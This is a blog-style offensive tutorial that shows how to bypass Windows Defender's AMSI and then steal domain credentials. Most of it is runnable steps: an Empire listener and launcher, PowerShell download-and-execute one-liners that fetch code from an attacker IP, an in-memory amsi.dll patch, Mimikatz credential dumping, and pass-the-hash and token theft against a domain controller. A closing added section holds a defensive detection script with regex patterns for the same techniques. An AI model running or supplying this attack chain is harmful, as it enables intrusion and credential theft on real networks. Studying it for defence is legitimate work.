Evade Windows Defender Mimikatz detection by patching the amsi.dll

Nol White Hat
Published in System Weakness
8 min read · Jul 31, 2022

Summary
In this article, I will show you how to use Empire and execute its Mimikatz module to dump the password hashes of logged-in users.

Disclaimer
This article is for informational and educational purposes only, and for those who are willing and curious to learn about security and penetration testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.

Details
Mimikatz (Benjamin Delpy) is the most famous tool for extracting passwords stored in memory. If you need the password of a logged-in user, Mimikatz does the job. Unfortunately, using this tool or similar tools has a downside these days: they are almost certainly detected by security software such as Windows Defender through the Antimalware Scan Interface (AMSI).

Malware detection can be bypassed using several powerful tools. An excellent resource for different kinds of Windows Defender AMSI bypasses can be found on Fabian Mosch’s site https://s3cur3th1ssh1t.github.io/. In this blog, I’ll show you how to use one of the scripts from Fabian Mosch’s website to bypass Windows Defender detection when using PowerShell Empire’s Mimikatz module. This PowerShell script patches amsi.dll, the library responsible for anti-malware scanning of script content on Windows, in the memory of the running PowerShell process.

This POC consists of three machines: the victim (Windows 10 Professional, 64-bit), a Windows Server 2012 R2 domain controller and an attacker machine (Kali Linux 2022.1).

Victim 01:
— Windows 10 Professional [version 10.0.19044.1706]
— IP address: 192.168.62.165
— Security: Windows Firewall on for all profiles, Windows Defender on
— User context: POC user is member of the local Administrators group and the Domain Users group

Victim 02 (‘Windows Domain Controller’):
— Windows Server 2012 R2 [version 6.3.9600] (180-day evaluation)
— IP address: 172.16.78.246
— Security: Antivirus detection and Windows Firewall all profiles on.

Attacker (for reverse shell):
— Kali Linux
— IP address: 192.168.62.161

The following requirements apply:
— you established an initial foothold (reverse shell) on the victim workstation (192.168.62.165)
— the exploited user is a member of the Domain Users group and has local Administrator privileges on his workstation (local Administrator rights are required in order to dump password hashes)
— the built-in Domain Administrator established a logged in session on the victim workstation (192.168.62.165)

The next sections include:
— Enumerate exploited user context
— Steps 1–8: setup Empire environment
— Steps 9–10: bypass Windows Defender detection
— Steps 11–12: use Empire’s module "Mimikatz" to dump the logged in user password hashes
— Steps 13–16: use Empire’s module "Mimikatz pth" to impersonate the Domain Administrator.

Before we start our PoC, let’s examine the exploited environment.

Screenshots (not reproduced here): Windows 10 Security Dashboard, Windows Defender Antivirus settings, Windows Firewall, Windows version.

Summary of the exploited environment.
The attacker landed on a fully updated Windows 10 client. This client has Windows Defender real-time scanning enabled, and all firewall profiles are enabled. The exploited user is a member of the Domain Users group and has local administrator privileges on his workstation. The attacker does not have direct TCP/IP access to the domain controller (it is in an isolated subnet).

POC: Evade Windows Defender detection of the PowerShell Empire agent

Let’s start the exploitation process.

1. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Start Empire server.

sudo powershell-empire server

2. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Open another terminal tab and start empire client.

powershell-empire client

3. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Create a new Empire listener.

listeners
uselistener http

Configure the listener (use your Kali IP address).

info
set Name blabla
set Host 192.168.62.161:443
set Port 443
execute
back

4. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Create a new Empire launcher.

usestager windows/launcher_bat
set Listener blabla
execute

5. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Copy the launcher to the HTTP staging directory (/tmp, served on port 80).

cp /var/lib/powershell-empire/empire/client/generated-stagers/launcher.bat /tmp

6. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Open a new terminal tab and start a temporary HTTP web server. We will use this server throughout the entire exploitation process.

python3 -m http.server 80 --directory /tmp

7. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Copy the contents of the file launcher.bat to the clipboard.

cat /tmp/launcher.bat

@echo off
start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.168.62.161:443/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex"
(goto) 2>nul & del "%~f0"

8. Performed on 192.168.62.165 (victim machine, Windows 10 reverse shell)

Paste the contents from the clipboard into the shell

@echo off
start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.168.62.161:443/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex"
(goto) 2>nul & del "%~f0"
Notice the error message: "The script contains malicious content…"

AMSI_bypass_Reflection.ps1

We have our challenge: get an Empire agent up and running without AMSI detection.

To overcome this problem we use the script AMSI_bypass_Reflection.ps1. This script performs “memory hijacking”: it patches the AmsiScanBuffer() function exported by amsi.dll in the memory of the current PowerShell process, so that it always returns AMSI_RESULT_CLEAN, the result code indicating that AMSI has found no malware.

9. Performed on 192.168.62.161 (attacker machine, Kali Linux).

Download the latest version of AMSI_bypass_Reflection.ps1 to the HTTP staging directory (/tmp)

wget https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1 -O /tmp/amsi-bypass.ps1

10. Performed on 192.168.62.165 (victim machine, Windows 10 reverse shell)

Use AMSI_bypass_Reflection.ps1 together with our Empire launcher.bat script.

Check the contents of the script /tmp/launcher.bat (see step 7) and copy only the PowerShell part of launcher.bat to the clipboard (all code between the first and second double quote):

(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.168.62.161:443/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex

Next, create the following one liner (paste contents of clipboard):

set LHOST="192.168.62.161"
set LPORTWEB=80
powershell -nol -w 1 -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://%LHOST%:%LPORTWEB%/amsi-bypass.ps1');Start-Sleep 2;<paste from clipboard>"

The end result is:

set LHOST="192.168.62.161"
set LPORTWEB=80
powershell -nol -w 1 -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://%LHOST%:%LPORTWEB%/amsi-bypass.ps1');Start-Sleep 2;(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.168.62.161:443/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex;"

Now, paste the end result into the reverse shell on the victim.

Also check the HTTP server terminal on Kali to confirm that amsi-bypass.ps1 was downloaded.

Check your powershell-empire client console. You should see a new agent check in. If not, try this step once more.

Note: you may still get a virus detection warning, but this does not stop the PowerShell Agent from connecting.

Use the “agents” command to see more details about the checked-in agent.

We beat the Windows Defender software and got ourselves an Empire shell!

Note the asterisk (*) behind the agent name. The asterisk means that we have an elevated agent connection, which is required for the credential dumping steps that follow. Reasons for not having an elevated Empire agent:
— UAC settings prevent the agent from running at a high integrity level
— the user is not a local Administrator

From here you can use the PowerShell Empire post-exploitation modules. In the next section I’ll show you specifically what you can do with the powershell/credentials/mimikatz/logonpasswords module.

11. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)

Load the Mimikatz module.

usemodule powershell/credentials/mimikatz/logonpasswords

12. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)

Extract the password hashes of all logged-in users from memory. You need to set your own agent name.

set Agent LFSEAMKN
execute

Wait until you see “Agent(s) received task results:”

interact LFSEAMKN

We have the NTLM (65ad2f6401724d2f73e7b7721dd28853) password hash for the Domain Administrator!

We can use this hash value with different pass-the-hash modules like powershell/lateral_movement/invoke_smbexec or powershell/credentials/mimikatz/pth.

In the last section I will demonstrate how to use this hash value to impersonate the Domain Administrator.

13. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)

Test if the exploited user is able to browse the c$ share on the target domain controller.

interact LFSEAMKM
shell
dir \\dc.mydomain.com\c$
exit

The exploited user does not have access to the domain controller c$ share.

14. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)

Load the Mimikatz pass-the-hash module.

usemodule powershell/credentials/mimikatz/pth

15. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)

Configure the module with the Domain Administrator NTLM hash.

set agent LFSEAMKM
set domain MYDOMAIN
set ntlm 65ad2f6401724d2f73e7b7721dd28853
set user Administrator
execute

Wait until you see “Agent(s) received task results:”

interact LFSEAMKM
Write down the PID of the process that the module spawned.

16. Performed on 192.168.62.165 (victim machine, Windows 10 Empire shell)

Use the Domain Administrator token (PID of cmd.exe) to browse the c$ share on the domain controller

back
interact LFSEAMKM
steal_token 2132

Wait until you see “Agent(s) received task results:”

shell
dir \\dc.mydomain.com\c$

We are able to browse the c$ share on the target domain controller!

Mitigation recommendations.

Sooner or later, malicious PowerShell scripts will be detected by the antivirus software vendors. At the time of writing (31 July 2022) the script AMSI_bypass_Reflection.ps1 was not detected by the Windows antivirus software. It probably will be in the near future. You can mitigate this by keeping your antivirus software up to date.
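Signature updates catch the bypass script only once a vendor ships them, so a defender's check that keys on the launch pattern used in steps 7 and 10 and on the amsi.dll tampering described above is worth having in parallel; the block below is added here as an example and is not code from the original article, Empire or Fabian Mosch's scripts. It assumes command lines and script blocks have already been flattened to one line per event (as Sysmon Event ID 1 or PowerShell Event ID 4104 would be in a SIEM), and its sample events are constructed from the values in this write-up.

```python
"""Triage PowerShell launch events for the patterns shown in this write-up.
Added example, not the article's own code. Input: one flattened event per line."""
import re

# (indicator name, pattern). Narrowed to what the article uses: launcher flags,
# the download cradle, Empire's stager URI, amsi.dll tampering, Mimikatz names.
INDICATORS = [
    ("ep_bypass", re.compile(r"-(?:ep|ExecutionPolicy)\s+bypass", re.I)),
    ("no_profile", re.compile(r"-(?:nop|NoProfile)\b", re.I)),
    ("hidden_window", re.compile(r"-(?:w|WindowStyle)\s+(?:1|hidden)\b", re.I)),
    ("download_cradle", re.compile(
        r"(?:iwr|Invoke-WebRequest|DownloadString)\b.*?(?:\|\s*iex\b|Invoke-Expression)", re.I)),
    ("iex_webclient", re.compile(r"\bIEX\s*\(\s*New-Object\s+Net\.WebClient\)", re.I)),
    ("empire_stager_uri", re.compile(r"/download/powershell/", re.I)),
    ("amsi_tamper", re.compile(r"amsi\.dll|AmsiScanBuffer|AMSI_RESULT_CLEAN|amsi-bypass", re.I)),
    ("mimikatz", re.compile(r"mimikatz|logonpasswords|sekurlsa", re.I)),
]


def match_indicators(event: str) -> list[str]:
    """Return the names of all indicators that match one flattened event line."""
    return [name for name, rx in INDICATORS if rx.search(event)]


def triage(event: str, threshold: int = 3) -> dict:
    """Label an event 'suspicious' on 3+ indicators or any AMSI/Mimikatz hit."""
    hits = match_indicators(event)
    alert = len(hits) >= threshold or bool({"amsi_tamper", "mimikatz"} & set(hits))
    return {"verdict": "suspicious" if alert else "benign", "hits": hits}


# Constructed sample events built from the steps above; not real telemetry.
SAMPLE_EVENTS = [
    "powershell.exe -nol -w 1 -nop -ep bypass \"(New-Object Net.WebClient).Proxy.Credentials="
    "[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://192.168.62.161:443/download/"
    "powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex\"",
    "powershell -nol -w 1 -nop -ep bypass \"IEX (New-Object Net.WebClient).DownloadString("
    "'http://192.168.62.161:80/amsi-bypass.ps1');Start-Sleep 2;iwr('http://192.168.62.161:443"
    "/download/powershell/Om1hdHRpZmVzdGF0aW9uIGV0dw==') -UseBasicParsing|iex;\"",
    'ScriptBlockText: $h = LoadLibrary("amsi.dll"); $p = GetProcAddress($h, "AmsiScanBuffer")',
    "powershell.exe -NoProfile -Command \"Get-Service -Name Spooler\"",  # routine admin use
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage(event))
```

The script block line matters most: once the bypass has run, AMSI no longer sees later content, but Event ID 4104 script block logging still records the bypass script itself.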

Credits

Credits to Fabian Mosch, alias S3cur3Th1sSh1t, for his research work
Credits to Shantanu Khandelwal (@shantanukhande) and Paul Laîné (@am0nsec) for developing AMSI Bypass
Credits to BC-Security for developing and maintaining Empire (https://github.com/BC-SECURITY)
